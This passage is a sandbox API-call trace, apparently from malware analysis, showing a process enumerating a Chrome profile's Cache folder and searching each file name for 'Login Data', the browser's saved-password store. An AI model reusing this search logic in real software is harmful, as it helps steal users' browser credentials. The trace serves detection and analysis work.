ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.442] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.442] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.442] FindNextFileW (in: hFindFile=0x8f9ac0, lpFindFileData=0x2df358 | out: lpFindFileData=0x2df358*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cache", cAlternateFileName="")) returned 1 [0161.442] lstrcmpiW (lpString1="Cache", lpString2=".") returned 1 [0161.442] lstrcmpiW (lpString1="Cache", lpString2="..") returned 1 [0161.442] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0161.442] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned 75 [0161.442] lstrlenW (lpString="\\") returned 1 [0161.442] GetProcessHeap () returned 0x8e0000 [0161.442] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x9a) returned 0x9254a8 [0161.442] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default" [0161.442] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0161.442] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned 76 [0161.442] lstrlenW (lpString="Cache") returned 5 [0161.442] GetProcessHeap () returned 0x8e0000 [0161.442] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa4) returned 0x925550 [0161.442] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\" [0161.442] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\", lpString2="Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" [0161.442] VirtualQuery (in: lpAddress=0x9254a8, lpBuffer=0x2df308, dwLength=0x1c | out: lpBuffer=0x2df308*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.442] GetProcessHeap () returned 0x8e0000 [0161.442] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9254a8 | out: hHeap=0x8e0000) returned 1 [0161.442] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 81 [0161.442] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 81 [0161.442] lstrlenW (lpString="\\*.*") returned 4 [0161.442] GetProcessHeap () returned 0x8e0000 [0161.442] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xac) returned 0x925600 [0161.442] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" [0161.443] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*.*" [0161.443] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\*.*", lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x8f9b00 [0161.443] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.443] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.443] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.443] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.443] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0e3de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb000, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_0", cAlternateFileName="")) returned 1 [0161.444] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 81 [0161.444] lstrlenW (lpString="\\") returned 1 [0161.444] GetProcessHeap () returned 0x8e0000 [0161.444] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa6) returned 0x9256b8 [0161.444] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" [0161.444] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0161.444] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 82 [0161.444] lstrlenW (lpString="data_0") returned 6 [0161.444] GetProcessHeap () returned 0x8e0000 [0161.444] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925768 [0161.444] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0161.444] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", lpString2="data_0" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0" [0161.444] VirtualQuery (in: lpAddress=0x9256b8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.444] GetProcessHeap () returned 0x8e0000 [0161.444] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256b8 | out: hHeap=0x8e0000) returned 1 [0161.444] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_0", lpSrch="Login Data") returned 0x0 [0161.444] VirtualQuery (in: lpAddress=0x925768, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.444] GetProcessHeap () returned 0x8e0000 [0161.444] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925768 | out: hHeap=0x8e0000) returned 1 [0161.444] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0e3de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x42000, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_1", cAlternateFileName="")) returned 1 [0161.444] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 81 [0161.444] lstrlenW (lpString="\\") returned 1 [0161.444] GetProcessHeap () returned 0x8e0000 [0161.444] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa6) returned 0x9256b8 [0161.444] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" [0161.444] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0161.444] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 82 [0161.444] lstrlenW (lpString="data_1") returned 6 [0161.444] GetProcessHeap () returned 0x8e0000 [0161.444] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925768 [0161.444] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0161.444] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", lpString2="data_1" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1" [0161.444] VirtualQuery (in: lpAddress=0x9256b8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.444] GetProcessHeap () returned 0x8e0000 [0161.445] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256b8 | out: hHeap=0x8e0000) returned 1 [0161.445] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_1", lpSrch="Login Data") returned 0x0 [0161.445] VirtualQuery (in: lpAddress=0x925768, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.445] GetProcessHeap () returned 0x8e0000 [0161.445] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925768 | out: hHeap=0x8e0000) returned 1 [0161.445] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_2", cAlternateFileName="")) returned 1 [0161.445] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 81 [0161.445] lstrlenW (lpString="\\") returned 1 [0161.445] GetProcessHeap () returned 0x8e0000 [0161.445] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa6) returned 0x9256b8 [0161.445] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" [0161.445] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0161.445] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 82 [0161.445] lstrlenW (lpString="data_2") returned 6 [0161.445] GetProcessHeap () returned 0x8e0000 [0161.445] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925768 [0161.445] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0161.445] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", lpString2="data_2" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2" [0161.445] VirtualQuery (in: lpAddress=0x9256b8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.445] GetProcessHeap () returned 0x8e0000 [0161.445] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256b8 | out: hHeap=0x8e0000) returned 1 [0161.445] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_2", lpSrch="Login Data") returned 0x0 [0161.445] VirtualQuery (in: lpAddress=0x925768, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.445] GetProcessHeap () returned 0x8e0000 [0161.445] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925768 | out: hHeap=0x8e0000) returned 1 [0161.445] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c0e3de0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x402000, dwReserved0=0x0, dwReserved1=0x0, cFileName="data_3", cAlternateFileName="")) returned 1 [0161.445] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 81 [0161.445] lstrlenW (lpString="\\") returned 1 [0161.445] GetProcessHeap () returned 0x8e0000 [0161.445] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa6) returned 0x9256b8 [0161.445] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" [0161.445] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0161.445] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 82 [0161.445] lstrlenW (lpString="data_3") returned 6 [0161.445] GetProcessHeap () returned 0x8e0000 [0161.446] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb2) returned 0x925768 [0161.446] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0161.446] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", lpString2="data_3" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3" [0161.446] VirtualQuery (in: lpAddress=0x9256b8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.446] GetProcessHeap () returned 0x8e0000 [0161.446] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256b8 | out: hHeap=0x8e0000) returned 1 [0161.446] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\data_3", lpSrch="Login Data") returned 0x0 [0161.446] VirtualQuery (in: lpAddress=0x925768, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.446] GetProcessHeap () returned 0x8e0000 [0161.446] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925768 | out: hHeap=0x8e0000) returned 1 [0161.446] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x80170, dwReserved0=0x0, dwReserved1=0x0, cFileName="index", cAlternateFileName="")) returned 1 [0161.446] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned 81 [0161.446] lstrlenW (lpString="\\") returned 1 [0161.446] GetProcessHeap () returned 0x8e0000 [0161.446] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xa6) returned 0x9256b8 [0161.446] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache" [0161.446] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0161.446] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned 82 [0161.446] lstrlenW (lpString="index") returned 5 [0161.446] GetProcessHeap () returned 0x8e0000 [0161.446] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0xb0) returned 0x925768 [0161.446] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\" [0161.446] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\", lpString2="index" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index" [0161.446] VirtualQuery (in: lpAddress=0x9256b8, lpBuffer=0x2df090, dwLength=0x1c | out: lpBuffer=0x2df090*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.446] GetProcessHeap () returned 0x8e0000 [0161.446] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x9256b8 | out: hHeap=0x8e0000) returned 1 [0161.446] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cache\\index", lpSrch="Login Data") returned 0x0 [0161.446] VirtualQuery (in: lpAddress=0x925768, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.446] GetProcessHeap () returned 0x8e0000 [0161.446] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925768 | out: hHeap=0x8e0000) returned 1 [0161.446] FindNextFileW (in: hFindFile=0x8f9b00, lpFindFileData=0x2df0e0 | out: lpFindFileData=0x2df0e0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x805aa0c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x805aa0c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x805aa0c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x80170, dwReserved0=0x0, dwReserved1=0x0, cFileName="index", cAlternateFileName="")) returned 0 [0161.446] FindClose (in: hFindFile=0x8f9b00 | out: hFindFile=0x8f9b00) returned 1 [0161.447] VirtualQuery (in: lpAddress=0x925600, lpBuffer=0x2df09c, dwLength=0x1c | out: lpBuffer=0x2df09c*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 